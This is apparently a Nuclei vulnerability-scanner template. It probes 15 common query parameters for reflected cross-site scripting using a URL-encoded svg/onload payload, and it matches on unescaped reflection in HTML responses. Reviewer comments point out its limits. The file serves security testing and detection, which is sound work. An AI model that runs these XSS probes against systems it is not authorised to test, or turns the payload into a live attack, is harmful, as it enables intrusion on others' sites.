nuclei-templates/vulnerabilities/generic/top-xss-params.yaml

---
# Nuclei template: heuristic check for reflected XSS on common query parameters.
# NOTE(review): the rendered listing lost its indentation and had per-line
# history timestamps interleaved; the nesting below is reconstructed from the
# key order. Confirm against the raw file.
id: top-xss-params

info:
  name: Top 15 XSS Check
  author: foulenzer & geeknik
  severity: medium
  description: Searches for reflected XSS in the server response via GET-requests.
  tags: xss
  # The 15 parameter names that the single request below populates.
  parameters: q,s,search,id,action,keyword,query,page,keywords,url,view,cat,name,key,p

requests:
  - method: GET
    path:
      # One request carries the same URL-encoded marker in every parameter.
      # Each copy ends in a distinct number (testing-xss1 .. testing-xss15), so
      # the number seen in the response body shows which parameter was echoed.
      - '{{BaseURL}}/?q=%27%3E%22%3Csvg%2Fonload=confirm%28%27testing-xss1%27%29%3E&s=%27%3E%22%3Csvg%2Fonload=confirm%28%27testing-xss2%27%29%3E&search=%27%3E%22%3Csvg%2Fonload=confirm%28%27testing-xss3%27%29%3E&id=%27%3E%22%3Csvg%2Fonload=confirm%28%27testing-xss4%27%29%3E&action=%27%3E%22%3Csvg%2Fonload=confirm%28%27testing-xss5%27%29%3E&keyword=%27%3E%22%3Csvg%2Fonload=confirm%28%27testing-xss6%27%29%3E&query=%27%3E%22%3Csvg%2Fonload=confirm%28%27testing-xss7%27%29%3E&page=%27%3E%22%3Csvg%2Fonload=confirm%28%27testing-xss8%27%29%3E&keywords=%27%3E%22%3Csvg%2Fonload=confirm%28%27testing-xss9%27%29%3E&url=%27%3E%22%3Csvg%2Fonload=confirm%28%27testing-xss10%27%29%3E&view=%27%3E%22%3Csvg%2Fonload=confirm%28%27testing-xss11%27%29%3E&cat=%27%3E%22%3Csvg%2Fonload=confirm%28%27testing-xss12%27%29%3E&name=%27%3E%22%3Csvg%2Fonload=confirm%28%27testing-xss13%27%29%3E&key=%27%3E%22%3Csvg%2Fonload=confirm%28%27testing-xss14%27%29%3E&p=%27%3E%22%3Csvg%2Fonload=confirm%28%27testing-xss15%27%29%3E'

    # At most one redirect is followed, so the response that matches may be the
    # redirect target rather than the URL that was requested.
    redirects: true
    max-redirects: 1

    # All three matchers must hold before a finding is reported.
    matchers-condition: and
    matchers:
      # The marker appears in the body with "<", "'" and "(" left unencoded.
      # This shows unescaped reflection only, not that a browser would run it:
      # the surrounding context (comment, textarea, script string) and any
      # Content-Security-Policy still decide that, so verify a hit manually.
      - type: word
        words:
          - "<svg/onload=confirm('testing-xss"
        part: body

      # Limits findings to responses that declare HTML.
      # NOTE(review): this looks like a plain substring match over the header
      # block, not a check pinned to Content-Type. Confirm.
      - type: word
        words:
          - 'text/html'
        part: header

      # Only successful responses count; error pages that echo input are ignored.
      - type: status
        status:
          - 200